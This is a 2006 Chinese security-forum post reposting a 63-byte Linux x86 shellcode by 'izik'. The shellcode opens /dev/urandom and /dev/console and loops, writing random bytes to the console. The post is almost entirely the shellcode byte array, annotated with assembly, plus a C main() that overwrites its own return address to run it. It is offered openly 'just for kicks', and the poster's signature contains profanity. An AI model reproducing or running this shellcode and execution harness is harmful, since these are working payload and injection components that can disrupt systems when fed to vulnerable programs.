‹‹ 上一主题 | 下一主题 ››
发新话题
打印

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9869 
精华
771 
积分
40986 
阅读权限
200 
性别
男 
在线时间
3986 小时 
注册时间
2004-7-4 
最后登录
2008-12-3 
楼主 发表于 2006-1-29 10:37  只看该作者

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

文章作者:izik
复制内容到剪贴板
代码:
/*
* (linux/x86) cat /dev/urandom > /dev/console, no real profit just for kicks - 63 bytes
* - izik <[email]izik@tty64.org[/email]>
*/

char shellcode[] =

  "\x31\xc9"          // xor %ecx,%ecx
  "\x51"            // push %ecx
  "\x68\x6e\x64\x6f\x6d"  // push $0x6d6f646e
  "\x68\x2f\x75\x72\x61"  // push $0x6172752f
  "\x68\x2f\x64\x65\x76"  // push $0x7665642f
  "\x89\xe3"          // mov %esp,%ebx
  "\xb1\x02"          // mov $0x2,%cl

  //
  // <_openit>:
  //

  "\x6a\x05"          // push $0x5
  "\x58"            // pop %eax
  "\x99"            // cltd
  "\xcd\x80"          // int $0x80
  "\x96"            // xchg %eax,%esi
  "\x5f"            // pop %edi
  "\x5d"            // pop %ebp
  "\x5d"            // pop %ebp
  "\x68\x73\x6f\x6c\x65"  // push $0x656c6f73
  "\x68\x2f\x63\x6f\x6e"  // push $0x6e6f632f
  "\x57"            // push %edi
  "\xe2\xe9"          // loop <_openit>

  "\x89\xc3"          // mov %eax,%ebx

  //
  // <_makeio>:
  //

  "\xb2\x04"          // mov $0x4,%dl
  "\x89\xe1"          // mov %esp,%ecx

  //
  // <_pre_ioloop>:
  //

  "\xb0\x03"          // mov $0x3,%al
  "\xf8"            // clc
  
  //
  // <_ioloop>:
  //

  "\xcd\x80"          // int $0x80
  "\x87\xde"          // xchg %ebx,%esi
  "\x72\xf7"          // jc <_pre_ioloop>
  "\xf9"            // stc
  "\xeb\xf7";         // jmp <_ioloop>

int main(int argc, char **argv) {
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int) shellcode;
}
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题